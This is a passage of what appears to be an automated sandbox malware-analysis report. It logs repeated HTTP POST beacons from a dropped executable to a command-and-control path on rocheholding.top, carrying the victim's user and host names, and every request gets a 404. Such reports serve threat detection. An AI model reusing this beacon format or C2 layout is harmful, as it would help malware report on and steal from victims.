                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:31.764251947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:32.421569109 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UwrTWntmtW4R85fKpiS8ojLNif1lIUexa%2F0v3WNlrpy0x5BYnITgi5EvZ6BbbNTOhXTNC7U%2BBW7JqKWjkjM2rJNO6h%2F40zBhs3ne21qLjnuql4sIx%2FV%2FByqaCLGsTXQv5T9Y"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c8eb97117ad-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      53192.168.2.2249217188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:37.677256107 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:37.737449884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:38.405973911 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehiBpDu%2FU8UgcX0XLOIigD3IhV1ekk1HohoLeO3lPU%2BobOh1Pho8F7Lyf3K35iETs%2B7YS5GPR0UfNQJuG83E9qGUsok3KHm1zezH2hdOZZ6G%2BFZZufLZWR0cvU3nDtotE2hE"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cb41d1a420d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      54192.168.2.2249218188.114.97.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:38.560339928 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:38.611571074 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:39.223416090 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltYz0bRtytArCayGcMZvBxLhtAhgWFzo65x%2BbOzEO%2FlYkIcpjApkQV55kJSirqSJGmQFN0dqr3zxF5UbFP7ZoUiPGKwvxIsp3X3DYte0CLfrOVCdsGM94AFcQkXqeFAs%2BHX6"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cb9da01428f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      55192.168.2.2249219188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:39.381191015 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:39.439939022 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:40.118145943 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FfItQ2F28WMpohWRqYCVgraURiCR%2BlpL72e7vMBFKW6avO9%2Bd0fpt%2Bo90A0tL1p3tBK5IkJG0ISpCwVxvWz898UP5ifcJ13HiPac8r%2B%2BjTWaEuWJWxweev76EGx2Xoo%2F71N"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cbecb0d4327-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      56192.168.2.2249220188.114.97.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:40.275028944 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:40.324969053 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:41.062020063 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RHMKrWB524eoCYwj73JhkGJWEVm%2F%2Fku4SgEclTKdkhbrMBdmOmblCNHevtIJEoKNhSD8tWJYkfSuhb6iFB0UP0FOV7tYAWN6qIyZ92CT3TQqz%2BNdBFc2RqU%2BrpsrzNRrk19"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cc4ab3b7c6f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      57192.168.2.2249221188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:41.210685968 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:41.263561964 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:41.825371027 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3ehChHzN2B0Fs%2BlTA2ysZlOCrEAtqYIqaDDXfDGCbyXWQ6Xpact%2FeB%2FmHi4ZaeBfJb4Z37BGX6YNB8BGLnXoucVjhP4VGv5HzTj6H8CHUAMpPsVdE%2BBFWqkpEN%2BNH%2FnLFJV"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cca1b051849-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      58192.168.2.2249222188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:41.981230974 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:42.035691977 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:42.757237911 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8zQe2OH0CR5QMw%2BjeNiAE9MezSOLxFFfo8nmSoNMZX0yQJSWnXAYiC6PTI95tcB%2FMixlt6H4eaqrZPtgJz0PsA5b6%2FUuT3sCBnh4z4Iyft6tzhGtu2FOQA62ZFQGeM7ChVe"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870ccf1e4d726e-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      59192.168.2.2249223188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:42.915751934 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:42.967454910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:43.629870892 CEST633INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZN5B3ZVPk8C3pKRJ%2FGh7LuLJWG79z6%2Buc%2B9vRW5qe%2BM8rTbqpvFlPki4HNEpSI6F8nw%2BESbZ6rRoh7u%2FT6XL0at5MLet35tAHO6%2BKMil3W6pIOfS%2FAmBFRb3WxEfkGVJUxA"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cd4dec1421c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      60192.168.2.2249224188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:43.784657955 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:43.836149931 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:44.555512905 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36%2FCEE2AC6GU7teWdGAWwFIgg359qm2I0ctqiY5pzAbVp80M9lk%2BRhMzQgTFMGOo2m5dvuN9clicTQuOIFS9MYr5cb458Ya9XBH10osByHzVQGlMPVlz%2FzF22PcybNNEyGAD"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cda5ce18c83-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      61192.168.2.2249225188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:44.730540991 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:44.785157919 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:45.475836992 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGnWgQO7%2FbNu0DZCyl3KOUfKVpBZ9RTokYZ%2F95CnyGkK%2FOilZmpfMUSsjJr6JmP%2FnaoDDNm6pHA30ultWgwnz1TmvtoUlRGQKyH5g1rEdZSqE845OA4AaATShOYCEdbqNGOF"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870ce03fde430f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      62192.168.2.2249226188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:45.625277042 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:45.676068068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:46.361529112 CEST633INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gJGcG4fy%2F2v0FuTdzDYQDHetOkyxb9nMmqXVLrZzVC6a86o1FhNpi6%2BqLKo2548OanW%2BKffI2fN%2BJaWr%2FKXx8sZsnv8a%2BySHP7UlIDgMXewUxC7%2BrjBMFEHwA92uU%2BZtDsG2"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870ce5dbf37295-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      63192.168.2.2249227188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:46.517579079 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:46.568125963 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:47.281491995 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGm295ElkMD4dU9034IJxEDzfkh09VoRvMnWPoV67yUW7ETrM0dmAdkPb6qBzeqtJcynmogCmlssb1U1rQda0%2Fu8IqPhas9T%2FAxWRsKphhPcfgjLLZNxKE4lor%2BMbkf5AmnF"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870ceb6af1c436-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      64192.168.2.2249228188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:47.441037893 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:47.492285967 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:48.175781965 CEST635INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MIbmHNgrEsWGJ3DLTK7Tm2a%2BpgWsToR5e8hj%2FMoBoUk%2BCOijTNhV4%2FpUQQ%2FkvXF9%2BmwKbhCPJhj%2BpLv1Z77Yr8EFp254oYu1t5lk%2FtGijZRspeTk8%2F8PViFL9MkhesjK76NW"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cf12cdf8cca-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      65192.168.2.2249229188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:48.359256983 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:48.416635990 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:48.995060921 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPCCyL%2F%2FCO8LsARZEbzOkQ%2FSSVsdxJhEDE8I6St%2Bz5TX9EEOTQxVY%2FNsBQkNuKdpdsM%2B0HzH1HMrZdcEr%2FdrFXlD6sJLKJQamInYWZBHxIrAwIo7nujV7b4WsBcr4FKyPRdo"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cf6dbc372bc-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      66192.168.2.2249230188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:49.167216063 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:49.224333048 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:49.907802105 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
